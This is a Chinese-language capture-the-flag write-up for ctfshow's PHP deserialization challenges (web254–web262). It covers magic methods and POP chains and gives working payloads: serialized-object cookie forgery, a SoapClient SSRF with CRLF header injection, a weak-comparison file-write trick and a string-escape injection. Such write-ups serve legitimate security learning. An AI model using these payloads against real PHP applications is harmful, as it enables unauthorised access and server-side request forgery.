ctfshow 反序列化

PHP反序列化前置知识

序列化和反序列化

对象是不能在字节流中传输的，序列化就是把对象转化为字符串以便存储和传输，反序列化就是将字符串转化为对象

魔术方法

__construct() //构造，当对象new时调用
__wakeup() //执行unserialize()时，先会调用这个函数
__sleep() //执行serialize()时，先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

ＰＯＰ链

web254

这里其实没有涉及反序列化。这题使用GET方式获取username和password的值，创建一个ctfshowUser对象，->代表指向，首先调用上面的login方法，login方法使用this代表前面的username和password的值为ctfshowUser的值xxxxxx，如果满足条件就把 $this->isVip=true，然后通过vipOneKeyGetFlag()通过判断获取flag，构造?username=xxxxxx&password=xxxxxx即可

web255

这题的区别在于login方法不能把isvip置为true，而且user为对cookie值进行反序列化的结果，这里我们需要对class ctfShowUser进行序列化，并且修改 public $isVip=false为true,首先构造序列化，然后将序列化结果以cookie方式传递

<?php
class ctfShowUser{
    public $isVip=true;
}
$a=new ctfShowUser;
echo urlencode(serialize($a));
?>
1
2
3
4
5
6
7

web256

这题需要构造username不等于password，原来他们都是xxxxxx,现在需要通过序列化修改初始值

web257

__construct() //构造，当对象new时调用
__destruct() //对象被销毁时触发
这题在新建对象时先实例化info，然后在销毁时调用getinfo方法，而我们的最终目的是调用backdoor的方法使用eval这个函数

web258

这题使用正则表达式过滤，使用+号绕过

web259

__call 在对象中调用一个不可访问方法时调用
在这道题中$vip->getFlag();因为调用了类中没有的方法所以会导致__call的执行

payload

$target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>
1
2
3
4
5
6
7
8

O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7Dr
传入vip，然后访问flag.txt即可

web260

此题只需要满足匹配条件就行

web261

题目是这样的，构造payload

    class ctfshowvip{
    	public $username="877.php";
    	public $password='';
}
$a=new ctfshowvip();
echo urlencode(serialize($a));
?>
1
2
3
4
5
6
7
8

首先，__construct方法是创建对象时调用的，我们现在给username和password赋予初值，同时对象销毁时调用__destruct，这里进行了弱类型比较，0x36D=877.php，然后__unserialize() 和 __wakeup()两个魔术方法都定义在用一个对象中， 则只有 __unserialize() 方法会生效，__wakeup() 方法会被忽略。这里进行了字符串拼接

web262字符串逃逸

这题主要考察字符串逃逸， PHP 在反序列化时，对类中不存在的属性也会进行反序列化
• PHP 在反序列化时，底层代码是以 ;作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的
序列化


需要构造 “;s:5:“token”;s:5:“admin”;}，一共27字符
构造payload
f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:“token”;s:5:“admin”;}，然后访问message.php即可